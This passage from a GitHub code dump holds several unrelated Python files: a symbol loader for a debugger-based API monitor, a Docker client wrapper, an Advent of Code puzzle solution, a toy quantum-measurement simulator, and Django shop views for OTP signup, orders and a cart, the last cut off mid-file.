0))\n\n\n# ---------------------------------------------------------------------------\n\ndef _pt_log(line):\n \"\"\"\n proxy to log.pt_log()\n \"\"\"\n log.pt_log(line)\n\n\n# ---------------------------------------------------------------------------\n# self-parsed symbol\n\n#\n# structure of v_tmp_symbols:\n# {\"kernel32.dll\": [(0x0000AA5C, 0x0000AA8D, lstrcmpW),\n# (0x00061B7D, 0x00061BAD, GetProcessId),\n# ...],\n# \"ntdll.dll\": [(0x0006FBD2, 0x0006FBDF, _tolower),\n# ...]}\n#\nglobal v_tmp_symbols\nv_tmp_symbols = {}\n\n\ndef _syms_load(sym_name, file_path):\n \"\"\"\n load self-parsed symbol from specified file path\n\n @param: sym_name : string : module name of symbols\n @param: file_path : string : symbol file path\n \"\"\"\n assert os.path.exists(file_path)\n\n global v_tmp_symbols\n assert sym_name not in v_tmp_symbols\n v_tmp_symbols[sym_name] = []\n\n try:\n f = open(file_path)\n except:\n _pt_log(\">>> open sym file error: %s\" % sym_name)\n else:\n for line in f:\n\n assert line.count(\" \") == 2\n splits = line.split(\" \")\n assert len(splits) == 3\n # offset format: HEX\n func_item = (int(splits[0], 16), int(splits[1], 16), splits[2].strip(\"\\n\"))\n\n v_tmp_symbols[sym_name].append(func_item)\n f.close()\n\n\ndef load_sysdll_syms():\n \"\"\"\n load self-parsed symbols of system dlls\n\n this should only be called once during each debug session\n\n !+ to export such xxx.txt symbol file, use my python scripts.\n \"\"\"\n # xp sp3\n sym_path = os.path.join(file_dir, \"symbols_xpsp3\")\n for parent, dirnames, filenames in os.walk(sym_path):\n\n for dirname in dirnames:\n 
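# directories are only logged here; os.walk still descends into them, so\n            # any .txt files they contain are handled on later loop iterations\n            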
_pt_log(\">>> load sysdll symbol, ignore dir: %s\" % dirname)\n\n for filename in filenames:\n\n # only parse txt files\n if not filename.endswith(\".txt\"):\n # _pt_log(\">>> load sysdll symbol, ignore file: %s\" % filename)\n continue\n\n sym_name = filename.replace(\".txt\", \"\")\n # _pt_log(\"loading symbols for module %-10s from file: %s\" % (sym_name, filename))\n _syms_load(sym_name.lower(), os.path.join(parent, filename))\n\n\ndef load_debugee_syms():\n \"\"\"\n load self-parsed symbolf of debugee.\n this shall be called after debugee file set\n \"\"\"\n target_file = util.gen_path_tail_debugee(\"_ida_names.txt\", has_ext=False)\n if os.path.exists(target_file):\n\n _pt_log(\">>> loading debugee symbol from file: %s\" % target_file)\n _syms_load(util.debugee_name(), target_file)\n\n else:\n _pt_log(\">>> debugee symbol file not found: %s\" % target_file)\n\n\nglobal v_tmp_pted_no_sym_md_names\nv_tmp_pted_no_sym_md_names = []\n\n\ndef sym_resolve(md_name, offset):\n \"\"\"\n resolve symbol from pre-loaded symbols\n\n @param: md_name : string : module name, as key in v_tmp_symbols\n @param: offset : int : offset that address relative to module base\n\n @return: tuple : (func_name, func_offset) or (None, None)\n \"\"\"\n assert md_name and len(md_name) != 0\n\n md_name = md_name.lower()\n\n global v_tmp_symbols\n assert v_tmp_symbols and len(v_tmp_symbols) != 0\n\n # if debugee symbol not loaded, return None, but no \"ASSERT\", because it's quite common.\n if md_name == util.debugee_name() and md_name not in v_tmp_symbols:\n return (None, None)\n\n # if not, parse module, put txt file under folder, run this again\n if md_name not in v_tmp_symbols:\n\n global v_tmp_pted_no_sym_md_names\n if md_name not in v_tmp_pted_no_sym_md_names:\n _pt_log(\">>> no sym for this md: %s\" % md_name)\n v_tmp_pted_no_sym_md_names.append(md_name)\n\n # assert False\n # for sample loading dll of its own...\n return (None, None)\n\n for func_item in v_tmp_symbols[md_name]:\n if func_item[0] <= offset and offset <= func_item[1]:\n return (func_item[2], offset - func_item[0])\n\n return (None, None)\n\n\ndef get_sym_sys_dll_names():\n \"\"\"\n get sys dll names that have symbols\n\n @return: list : a list of dict\n \"\"\"\n global v_tmp_symbols\n if len(v_tmp_symbols) == 0:\n load_sysdll_syms()\n # all md names is lower()ed\n return v_tmp_symbols.keys()\n\n\ndef check_has_sys_dll_sym(sys_dll_name):\n \"\"\"\n @param: sys_dll_name : string : system dll name\n\n @return: bool :\n \"\"\"\n global v_tmp_symbols\n return sys_dll_name in v_tmp_symbols\n\n\ndef check_is_sys_dll(sys_dll_name):\n \"\"\"\n @param: sys_dll_name : string : system dll name\n\n @return: bool :\n \"\"\"\n global v_tmp_symbols\n return sys_dll_name in v_tmp_symbols\n\n\n# ---------------------------------------------------------------------------\n# END OF FILE\n# ---------------------------------------------------------------------------\n","repo_name":"xrkk/DbgBasedApiMon","sub_path":"_util/sym/sym.py","file_name":"sym.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"41792162018","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport json\nimport sys\nimport logging\n\nimport six\nfrom docker.errors import APIError\n\nfrom ..exceptions import DockerStatusError\nfrom ..docker_api import APIClient\nfrom . 
import use_get_archive\nfrom .docker_util import DockerUtilityMixin\n\nlog = logging.getLogger(__name__)\n\nLOG_PROGRESS_FORMAT = \"{0} {1} {2}\"\nLOG_CONTAINER_FORMAT = \"[%s] %s\"\n\n\ndef parse_response(response):\n \"\"\"\n Decodes the JSON response, simply ignoring syntax errors. Therefore it should be used for filtering visible output\n only.\n\n :param response: Server response as a JSON string.\n :type response: unicode | str\n :return: Decoded object from the JSON string. Returns an empty dictionary if input was invalid.\n :rtype: dict\n \"\"\"\n if isinstance(response, six.binary_type):\n response = response.decode('utf-8')\n try:\n obj = json.loads(response)\n except ValueError:\n return {}\n return obj\n\n\nclass DockerClientWrapper(DockerUtilityMixin, APIClient):\n \"\"\"\n Adds a few utility functions to the Docker API client.\n \"\"\"\n def _docker_log_stream(self, response, raise_on_error):\n log_str = None\n image_str = None\n for e in response:\n output = parse_response(e)\n if 'stream' in output:\n log_str = output['stream']\n if log_str.startswith('Successfully built '):\n image_str = log_str\n self.push_log(log_str, logging.INFO)\n elif 'error' in output:\n log_str = output['error']\n self.push_log(log_str, logging.ERROR)\n if raise_on_error:\n raise DockerStatusError(log_str, output.get('errorDetail'))\n return image_str or log_str # Line with image id or last line written to stdout\n\n def _docker_status_stream(self, response, raise_on_error):\n result = {}\n for e in response:\n output = parse_response(e)\n if output:\n result.update(output)\n if 'status' in output:\n oid = output.get('id')\n progress = output.get('progress', '')\n if oid:\n self.push_progress(output['status'], oid, progress)\n else:\n self.push_log(output['status'], logging.INFO)\n elif 'error' in output:\n error_message = output['error']\n self.push_log(error_message, logging.ERROR)\n if raise_on_error:\n raise DockerStatusError(error_message, output.get('errorDetail'))\n return result\n\n def push_progress(self, status, object_id, progress):\n \"\"\"\n Handles streamed progress information.\n\n :param status: Status text.\n :type status: unicode | str\n :param object_id: Object that the progress is reported on.\n :type object_id: unicode | str\n :param progress: Progress bar.\n :type progress: unicode | str\n \"\"\"\n pass\n\n def build(self, tag, add_latest_tag=False, add_tags=None, raise_on_error=True, **kwargs):\n \"\"\"\n Overrides the superclass `build()` and filters the output. Messages are deferred to `push_log`, whereas the\n final message is checked for a success message. If the latter is found, only the new image id is returned.\n\n :param tag: Tag of the new image to be built. Unlike in the superclass, this is obligatory.\n :type tag: unicode | str\n :param add_latest_tag: In addition to the image ``tag``, tag the image with ``latest``.\n :type add_latest_tag: bool\n :param add_tags: Additional tags. Can also be used as an alternative to ``add_latest_tag``.\n :type add_tags: list[unicode | str]\n :param raise_on_error: Raises errors in the status output as a DockerStatusException. 
Otherwise only logs\n errors.\n :type raise_on_error: bool\n :param kwargs: See :meth:`docker.client.Client.build`.\n :return: New, generated image id or `None`.\n :rtype: unicode | str\n \"\"\"\n response = super(DockerClientWrapper, self).build(tag=tag, **kwargs)\n # It is not the kwargs alone that decide if we get a stream, so we have to check.\n if isinstance(response, tuple):\n image_id = response[0]\n else:\n last_log = self._docker_log_stream(response, raise_on_error)\n if last_log and last_log.startswith('Successfully built '):\n # Remove prefix\n if last_log[-1] == '\\n':\n image_id = last_log[19:-1]\n else:\n image_id = last_log[19:]\n else:\n image_id = None\n\n if not image_id:\n return None\n\n self.add_extra_tags(image_id, tag, add_tags, add_latest_tag)\n return image_id\n\n def login(self, username, password=None, email=None, registry=None, reauth=False, **kwargs):\n \"\"\"\n Login to a Docker registry server.\n\n :param username: User name for login.\n :type username: unicode | str\n :param password: Login password; may be ``None`` if blank.\n :type password: unicode | str\n :param email: Optional; email address for login.\n :type email: unicode | str\n :param registry: Optional registry URL to log in to. Uses the Docker index by default.\n :type registry: unicode | str\n :param reauth: Re-authenticate, even if the login has been successful before.\n :type reauth: bool\n :param kwargs: Additional kwargs to :meth:`docker.client.Client.login`.\n :return: ``True`` if the login has succeeded, or if it has not been necessary as it succeeded before. ``False``\n otherwise.\n :rtype: bool\n \"\"\"\n response = super(DockerClientWrapper, self).login(username, password, email, registry, reauth=reauth, **kwargs)\n return response.get('Status') == 'Login Succeeded' or response.get('username') == username\n\n def pull(self, repository, tag=None, stream=False, raise_on_error=True, **kwargs):\n \"\"\"\n Pulls an image repository from the registry.\n\n :param repository: Name of the repository.\n :type repository: unicode | str\n :param tag: Optional tag to pull; by default pulls all tags of the given repository.\n :type tag: unicode | str\n :param stream: Use the stream output format with additional status information.\n :type stream: bool\n :param raise_on_error: Raises errors in the status output as a DockerStatusException. Otherwise only logs\n errors.\n :type raise_on_error: bool\n :param kwargs: Additional kwargs for :meth:`docker.client.Client.pull`.\n :return: ``True`` if the image has been pulled successfully.\n :rtype: bool\n \"\"\"\n response = super(DockerClientWrapper, self).pull(repository, tag=tag, stream=stream, **kwargs)\n if stream:\n result = self._docker_status_stream(response, raise_on_error)\n else:\n result = self._docker_status_stream(response.split('\\r\\n') if response else (), raise_on_error)\n return result and not result.get('error')\n\n def push(self, repository, stream=False, raise_on_error=True, **kwargs):\n \"\"\"\n Pushes an image repository to the registry.\n\n :param repository: Name of the repository (can include a tag).\n :type repository: unicode | str\n :param stream: Use the stream output format with additional status information.\n :type stream: bool\n :param raise_on_error: Raises errors in the status output as a DockerStatusException. 
Otherwise only logs\n errors.\n :type raise_on_error: bool\n :param kwargs: Additional kwargs for :meth:`docker.client.Client.push`.\n :return: ``True`` if the image has been pushed successfully.\n :rtype: bool\n \"\"\"\n response = super(DockerClientWrapper, self).push(repository, stream=stream, **kwargs)\n if stream:\n result = self._docker_status_stream(response, raise_on_error)\n else:\n result = self._docker_status_stream(response.split('\\r\\n') if response else (), raise_on_error)\n return result and not result.get('error')\n\n def push_container_logs(self, container):\n \"\"\"\n Reads the current container logs and passes them to :meth:`~push_log`. Removes a trailing empty line and\n prefixes each log line with the container name.\n\n :param container: Container name or id.\n :type container: unicode | str\n \"\"\"\n logs = self.logs(container).decode('utf-8')\n log_lines = logs.split('\\n')\n if log_lines and not log_lines[-1]:\n log_lines.pop()\n for line in log_lines:\n self.push_log(LOG_CONTAINER_FORMAT, logging.INFO, container, line)\n\n def remove_container(self, container, raise_on_error=True, raise_not_found=False, **kwargs):\n \"\"\"\n Removes a container. For convenience optionally ignores API errors.\n\n :param container: Container name or id.\n :type container: unicode | str\n :param raise_on_error: Errors on stop and removal may result from Docker volume problems, that may not\n affect further actions. Such errors are always logged, but do not raise an exception if this is set to\n ``True``.\n :type raise_on_error: bool\n :param raise_not_found: Whether to raise 404 errors, i.e. that the container to be removed was not\n found. Default is ``False``.\n :type raise_not_found: bool\n :param kwargs: Additional keyword args for :meth:`docker.client.Client.remove_container`.\n \"\"\"\n try:\n super(DockerClientWrapper, self).remove_container(container, **kwargs)\n except APIError as e:\n exc_info = sys.exc_info()\n if e.response.status_code == 404:\n if raise_not_found:\n six.reraise(*exc_info)\n else:\n self.push_log(\"Failed to remove container '%s': %s\", logging.ERROR, container, e.explanation)\n if raise_on_error:\n six.reraise(*exc_info)\n\n def remove_image(self, image, raise_on_error=True, raise_not_found=False, **kwargs):\n \"\"\"\n Removes a container. For convenience optionally ignores API errors.\n\n :param image: Image name or id.\n :type image: unicode | str\n :param raise_on_error: Errors on image removal may not affect further actions. Such errors are always\n logged, but do not raise an exception if this is set to ``True``.\n :param raise_not_found: Whether to raise 404 errors, i.e. that the image to be removed was not\n found. Default is ``False``.\n :type raise_not_found: bool\n :param kwargs: Additional keyword args for :meth:`docker.client.Client.remove_image`.\n \"\"\"\n try:\n super(DockerClientWrapper, self).remove_image(image, **kwargs)\n except APIError as e:\n exc_info = sys.exc_info()\n if e.response.status_code == 404:\n if raise_not_found:\n six.reraise(*exc_info)\n else:\n self.push_log(\"Failed to remove image '%s': %s\", logging.ERROR, image, e.explanation)\n if raise_on_error:\n six.reraise(*exc_info)\n\n def stop(self, container, raise_on_error=True, **kwargs):\n \"\"\"\n Stops a container. For convenience optionally ignores API errors.\n\n :param container: Container name.\n :type container: unicode | str\n :param raise_on_error: Errors on stop and removal may result from Docker volume problems, that may not\n affect further actions. 
Such errors are always logged, but do not raise an exception if this is set to\n ``True``.\n :type raise_on_error: bool\n :param kwargs: Additional keyword args for :meth:`docker.client.Client.stop`.\n \"\"\"\n try:\n super(DockerClientWrapper, self).stop(container, **kwargs)\n except APIError as e:\n exc_info = sys.exc_info()\n self.push_log(\"Failed to stop container '%s': %s\", logging.ERROR, container, e.explanation)\n if raise_on_error:\n six.reraise(*exc_info)\n\n def copy_resource(self, container, resource, local_filename):\n \"\"\"\n *Experimental:* Copies a resource from a Docker container to a local tar file. For details, see\n :meth:`docker.client.Client.copy`.\n\n :param container: Container name or id.\n :type container: unicode | str\n :param resource: Resource inside the container.\n :type resource: unicode | str\n :param local_filename: Local file to store resource into. Will be overwritten if present.\n :type local_filename: unicode | str\n \"\"\"\n if use_get_archive(self.api_version):\n raw = self.get_archive(container, resource)[0]\n else:\n raw = self.copy(container, resource)\n try:\n with open(local_filename, 'wb+') as f:\n for buf in raw:\n f.write(buf)\n finally:\n raw.close()\n\n def save_image(self, image, local_filename):\n \"\"\"\n *Experimental:* Copies an image from Docker to a local tar file. For details, see\n :meth:`docker.client.Client.get_image`.\n\n :param image: Image name or id.\n :type image: unicode | str\n :param local_filename: Local file to store image into. Will be overwritten if present.\n :type local_filename: unicode | str\n \"\"\"\n raw = self.get_image(image)\n try:\n with open(local_filename, 'wb+') as f:\n for buf in raw:\n f.write(buf)\n finally:\n raw.close()\n","repo_name":"merll/docker-map","sub_path":"dockermap/client/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14010,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"72"} +{"seq_id":"11926348335","text":"\ninp = open(\"day13.input\").readlines()\nts = int(inp[0])\nbusses = [int(x) for x in inp[1].strip().split(\",\") if x != \"x\"]\nprint(ts, busses)\n\nminutes = 0\nwhile not any(map(lambda n: (ts+minutes) % n == 0, busses)):\n minutes += 1\nbus = list(filter(lambda n: (ts+minutes) % n == 0, busses))\n\nprint(ts+minutes, bus, minutes*bus[0])\nschedule = [int(x) for x in inp[1].strip().replace(\"x\", \"-1\").split(\",\")]\n\nnb = []\nfor i in range(len(schedule)):\n if schedule[i] == -1:\n continue\n nb += [(i, schedule[i])]\n\n\nn, a = zip(*nb)\nprint(n, a)\n\nstepSize = 1\nwaiting = True\nts = stepSize\n#i = 1\nbroken = False\nfor i in range(len(a)):\n while (ts+n[i]) % a[i] != 0:\n ts += stepSize\n print(f\"Found ts {ts} satisfying bus {i}, {a[i]}\")\n stepSize *= a[i]\n\nprint(ts)\nprint(\"#\"*80)\n","repo_name":"cpebble/advent_of_code","sub_path":"2020/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6770680889","text":"#!/usr/bin/env python3\n\nimport random\n\nBLACK, WHITE = True, False\nHARD, SOFT = True, False\n\n\nclass Bench:\n def __init__(self, width, height):\n self.grid = []\n self.source_location = None\n\n for i in range(height):\n self.grid.append([Space()] * width)\n\n def display(self):\n for row in self.grid:\n print(\" \".join(cell.display for cell in row))\n\n def place(self, x, y, component):\n if not isinstance(self.grid[y][x], Space):\n raise ValueError\n if 
isinstance(component, Source):\n if self.source_location:\n raise ValueError # only one source allowed\n self.source_location = (x, y)\n self.grid[y][x] = component\n\n def run(self, iterations=1):\n for i in range(iterations):\n # classical for now\n p = dict(\n color=random.choice([BLACK, WHITE]),\n hardness=random.choice([HARD, SOFT]),\n )\n x, y = self.source_location\n dx, dy = 1, 0\n while True:\n x += dx\n y += dy\n try:\n p, dx, dy = self.grid[y][x].hit(p, dx, dy)\n if (dx, dy) == (0, 0):\n break\n except IndexError:\n break\n\n\nclass Space:\n display = \".\"\n\n def hit(self, p, dx, dy):\n return p, dx, dy\n\n\nclass Source:\n display = \"S\"\n\n\nclass Box:\n def hit(self, p, dx, dy):\n if (dx, dy) != (1, 0): # particle must come from left\n return p, 0, 0\n if p[self.property_name]:\n return p, 0, -1\n else:\n return p, 1, 0\n\n\nclass ColorBox(Box):\n display = \"C\"\n property_name = \"color\"\n\n\nclass HardnessBox(Box):\n display = \"H\"\n property_name = \"hardness\"\n\n\nclass Mirror:\n display = \"/\"\n\n def hit(self, p, dx, dy):\n return p, -dy, -dx\n\n\nclass Joiner:\n display = \"M\"\n\n def hit(self, p, dx, dy):\n if (dx, dy) == (1, 0) or (dx, dy) == (0, -1):\n return p, 1, 0\n else:\n return p, 0, 0\n\n\nclass Wall:\n display = \"W\"\n\n def hit(self, p, dx, dy):\n return p, 0, 0\n\n\nclass Detector:\n display = \"D\"\n\n def __init__(self):\n self.count = 0\n\n def hit(self, p, dx, dy):\n self.count += 1\n return p, 0, 0\n\n\nif __name__ == \"__main__\":\n bench = Bench(10, 10)\n bench.place(1, 8, Source())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(8, 8, detector_1)\n bench.place(6, 6, detector_2)\n bench.display()\n bench.run()\n print(detector_1.count)\n print(detector_2.count)\n\n bench.place(6, 8, Mirror())\n bench.display()\n bench.run(2)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(10, 10)\n bench.place(1, 8, Source())\n bench.place(5, 8, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(7, 8, detector_1)\n bench.place(5, 6, detector_2)\n bench.display()\n bench.run(100)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(10, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(7, 8, detector_1)\n bench.place(5, 6, detector_2)\n bench.display()\n bench.run(100)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(10, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n bench.place(7, 8, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(9, 8, detector_1)\n bench.place(7, 6, detector_2)\n bench.display()\n bench.run(100)\n # the result here will be very different classical vs quantum\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(13, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n bench.place(5, 6, Mirror())\n bench.place(7, 8, Mirror())\n bench.place(7, 6, Joiner())\n bench.place(9, 6, HardnessBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(11, 6, detector_1)\n bench.place(9, 4, detector_2)\n bench.display()\n bench.run(100)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(13, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, HardnessBox())\n bench.place(5, 8, HardnessBox())\n bench.place(5, 6, Mirror())\n bench.place(7, 8, Mirror())\n 
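# the two mirrors redirect both outputs of the hardness box so that the\n    # paths recombine at the joiner before the final box and detectors\n    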
bench.place(7, 6, Joiner())\n bench.place(9, 6, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(11, 6, detector_1)\n bench.place(9, 4, detector_2)\n bench.display()\n bench.run(100)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(13, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n bench.place(5, 6, Mirror())\n bench.place(7, 8, Mirror())\n bench.place(7, 6, Joiner())\n bench.place(9, 6, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(11, 6, detector_1)\n bench.place(9, 4, detector_2)\n bench.display()\n bench.run(100)\n # the result here will be very different classical vs quantum\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(13, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n bench.place(5, 6, Mirror())\n bench.place(7, 8, Mirror())\n bench.place(6, 8, Wall())\n bench.place(7, 6, Joiner())\n bench.place(9, 6, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(11, 6, detector_1)\n bench.place(9, 4, detector_2)\n bench.display()\n bench.run(100)\n # the result here will be very different classical vs quantum\n print(detector_1.count)\n print(detector_2.count)\n","repo_name":"jtauber/quantum-workbench","sub_path":"qwb.py","file_name":"qwb.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33721984566","text":"from rest_framework import generics\nfrom rest_framework.views import APIView\nfrom adminn.models import Product\nfrom client.models import Coupon\nfrom client.serializer import CouponSerializer, ProductWithOptionSerializer\nfrom .serializer import *\nfrom adminn.serializers import ProductSerializer\nfrom .models import *\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom .models import User\nfrom rest_framework.response import Response\nfrom django.http import HttpResponse, JsonResponse\nfrom adminn.models import Option\nfrom rest_framework.decorators import api_view, permission_classes\nfrom django.core.mail import send_mail\nfrom rest_framework.parsers import FormParser, MultiPartParser\nimport vonage, os\nfrom django.conf import settings\nprint(f\"EMAIL_HOST = {settings.EMAIL_HOST}\")\n\nclient = vonage.Client(key=os.environ.get(\"SMS_KEY\"), secret=os.environ.get(\"SMS_SECRET\"))\nsms = vonage.Sms(client)\n\n\ndef generate__otp():\n otp = random.randint(100000, 999999)\n return otp\n\n\ndef send_otp(ph_number, otp):\n response = sms.send_message({\n 'from': 'VIMANI',\n 'to': ph_number,\n 'text': f\"Your OTP is {otp}\",\n })\n return response\n\n\ndef send_email(email, subject, otp):\n message = f\"This is verification code for your vimani account.\\n\\n{otp}\"\n send_mail(subject, message, 'Vimani Pvt. 
', [email], fail_silently=False)\n\n\nclass UserDetails(generics.RetrieveAPIView):\n permission_classes = [IsAuthenticated]\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n def get(self, request):\n return Response(self.serializer_class(request.user).data)\n\n\nclass RegisterView(generics.CreateAPIView):\n permission_classes = [AllowAny]\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n def post(self, request):\n data = request.data\n data[\"is_email_verified\"] = False\n data[\"is_mobile_verified\"] = False\n data[\"active\"] = False\n data[\"last_otp_email\"] = generate__otp()\n data[\"last_otp_ph_number\"] = generate__otp()\n serializer = self.serializer_class(data=data)\n res = send_otp(data[\"ph_number\"], data[\"last_otp_ph_number\"])\n print(res)\n if res[\"messages\"][0][\"status\"] != \"0\":\n return Response({\"error\": \"Something went wrong. Please try again later.\"})\n if serializer.is_valid():\n serializer.save()\n send_email(data[\"email\"], \"Vimani OTP\", data[\"last_otp_email\"])\n return Response(serializer.data)\n return Response(serializer.errors)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef verify_otp(request):\n data = request.data\n user = User.objects.get(ph_number=data[\"ph_number\"])\n email_verified = user.is_email_verified\n mobile_verified = user.is_mobile_verified\n if user.last_otp_email == int(data[\"email_otp\"]):\n user.is_email_verified = True\n user.save()\n email_verified = True\n if user.last_otp_ph_number == int(data[\"mobile_otp\"]):\n user.is_mobile_verified = True\n user.save()\n mobile_verified = True\n if email_verified and mobile_verified:\n user.active = True\n user.save()\n return Response({\"success\": \"Your account has been verified.\", \"user\": UserSerializer(user).data, \"token\": user.auth_token.key})\n return JsonResponse({\"status\": \"failure\", \"email\": email_verified, \"mobile\": mobile_verified})\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef resend_otp(request):\n data = request.data\n user = User.objects.get(ph_number=data[\"ph_number\"])\n res = send_otp(str(user.ph_number).replace(\"+\",\"\"), user.last_otp_ph_number)\n if res[\"messages\"][0][\"status\"] != \"0\":\n return Response({\"error\": \"Something went wrong. 
Please try again later.\"})\n send_email(user.email, \"Vimani OTP\", user.last_otp_email)\n return JsonResponse({\"status\": \"success\"})\n\n\nclass AddressApi(generics.ListCreateAPIView):\n queryset = Address.objects.all()\n serializer_class = AddressSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n return super().get_queryset().filter(user=self.request.user)\n\n def post(self, request):\n data = request.data\n data[\"user\"] = request.user.id\n serialized = self.serializer_class(data=data)\n if serialized.is_valid():\n serialized.save()\n return Response({\"success\": True, \"data\": serialized.data})\n return Response({\"success\": False, \"error\": serialized.errors})\n\n\nclass AddressUpdateApi(generics.UpdateAPIView):\n queryset = Address.objects.all()\n serializer_class = AddressSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass OrderApi(generics.ListCreateAPIView):\n queryset = MidOrder.objects.all()\n serializer_class = MidOrderWithStatusSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n return super().get_queryset().filter(order__user=self.request.user)\n\n def post(self, request):\n data = request.data\n if not data or \"products\" not in data:\n return Response(400)\n data[\"user\"] = request.user.id\n products = data.pop(\"products\")\n address = Address.objects.filter(address_id=data.pop(\"address_id\")).first()\n if not address:\n return Response({\"success\": False, \"error\": \"Invalid address\"})\n \n # signature\n # rz_payment_id\n # rz_order_id\n if data['payment_method'].lower() != 'cod':\n rz_data = {\n 'razorpay_order_id': data.get('rz_order_id'),\n 'razorpay_payment_id': data.get('rz_payment_id'),\n 'razorpay_signature': data.get('signature')\n }\n if not (settings.CLIENT.utility.verify_payment_signature(rz_data)):\n return Response({\"success\": False, \"error\": \"payment id not valid\"})\n \n data[\"address\"] = f\"{address.name}, {address.address_1}, {address.address_2}, {address.city}, {address.state}, {address.country}, {address.ph_number}\"\n order = OrderSerializer(data=data)\n total_amount = 0\n if order.is_valid():\n order.save()\n for product in products:\n if \"id\" not in product:\n continue\n option = Option.objects.filter(id=product[\"id\"]).first()\n if option:\n mid_order = {\n \"product\": option.id,\n \"order\": order.data[\"oid\"],\n \"unit_size\": option.unit_size,\n \"product_price\": option.product.sale_price,\n \"quantity\": product[\"quantity\"],\n }\n mid = MidOrderSerializer(data=mid_order)\n if mid.is_valid():\n mid.save()\n status = OrderStatusSerializer(data={\"status\": \"order_placed\", \"midorder\": mid.data[\"mid\"]})\n if status.is_valid():\n status.save()\n option.in_stock = option.in_stock - int(product[\"quantity\"])\n option.save()\n product = option.product\n product.orders += 1\n product.save()\n brand = product.brand\n brand.orders += 1\n brand.save()\n category = product.category\n category.orders += 1\n category.save()\n subcategory = product.subcategory\n subcategory.orders += 1\n subcategory.save()\n total_amount += option.product.sale_price * int(mid.data[\"quantity\"])\n else:\n print(mid.errors)\n created_order = Order.objects.get(oid=order.data[\"oid\"])\n created_order.total_amount = total_amount\n created_order.save()\n return Response({\"success\":True, \"data\": OrderWithMidOrder(created_order).data})\n return Response({\"success\": False, \"error\": order.errors})\n\n\nclass UpdateStatus(generics.UpdateAPIView):\n queryset = 
MidOrder.objects.all()\n serializer_class = MidOrderSerializer\n permission_classes = [IsAuthenticated]\n\n def get_object(self):\n return self.get_queryset().filter(order__user=self.request.user).filter(mid=self.kwargs.get(\"pk\")).first()\n\n def update(self, request, *args, **kwargs):\n data = request.data\n if not data or \"status\" not in data:\n return Response(400)\n mid = self.get_object()\n if mid:\n if \"cancel\" in data[\"status\"].lower():\n mid.is_canceled = True\n mid.status = data[\"status\"]\n mid.save()\n status = OrderStatusSerializer(data={\"status\": data[\"status\"], \"midorder\": mid.mid})\n if status.is_valid():\n status.save()\n return Response({\"success\": True, \"data\": status.data})\n return Response({\"success\": False, \"error\": status.errors})\n return Response({\"success\": False, \"error\": \"Mid order not found\"})\n\n\nclass OrderByStatus(generics.ListAPIView):\n queryset = MidOrder.objects.all()\n serializer_class = MidOrderWithStatusSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n return super().get_queryset().filter(order__user=self.request.user).filter(status=self.request.GET.get(\"status\"))\n\n\nclass CartApi(APIView):\n\n queryset = Cart.objects.all()\n permission_classes = [IsAuthenticated]\n serializer_class = CartWithProductSerializer\n \n def get(self, request):\n cart = request.user.cart_set.all()\n return JsonResponse({\"cart\": self.serializer_class(cart, many=True).data}, safe=False)\n\n def post(self, request):\n cart = request.user.cart_set.all()\n option = Option.objects.filter(id=request.data.get(\"id\")).first()\n if option in cart:\n return JsonResponse({\"success\": False, \"error\": \"Product already in cart\"})\n data = request.data\n data[\"option\"] = data.pop(\"id\")\n data[\"product\"] = option.product.pid\n data[\"user\"] = request.user.id\n serialized = CartSerializer(data=data)\n if serialized.is_valid():\n serialized.save()\n return JsonResponse({\"success\": True, \"data\": serialized.data}, safe=False)\n return JsonResponse({\"success\": False, \"error\": serialized.errors}, safe=False)\n \n def put(self, request):\n try:\n cart_product = request.user.cart_set.all().get(option=request.data.get(\"id\"))\n except:\n return HttpResponse(404)\n if cart_product:\n cart_product.quantity = request.data.get(\"quantity\", 1)\n cart_product.save()\n return JsonResponse({\"success\": True}, safe=False)\n else: return HttpResponse(404)\n \n def delete(self, request):\n cart_product = request.user.cart_set.all().get(option=request.GET.get(\"id\"))\n if cart_product:\n cart_product.delete()\n return JsonResponse({\"success\": True}, 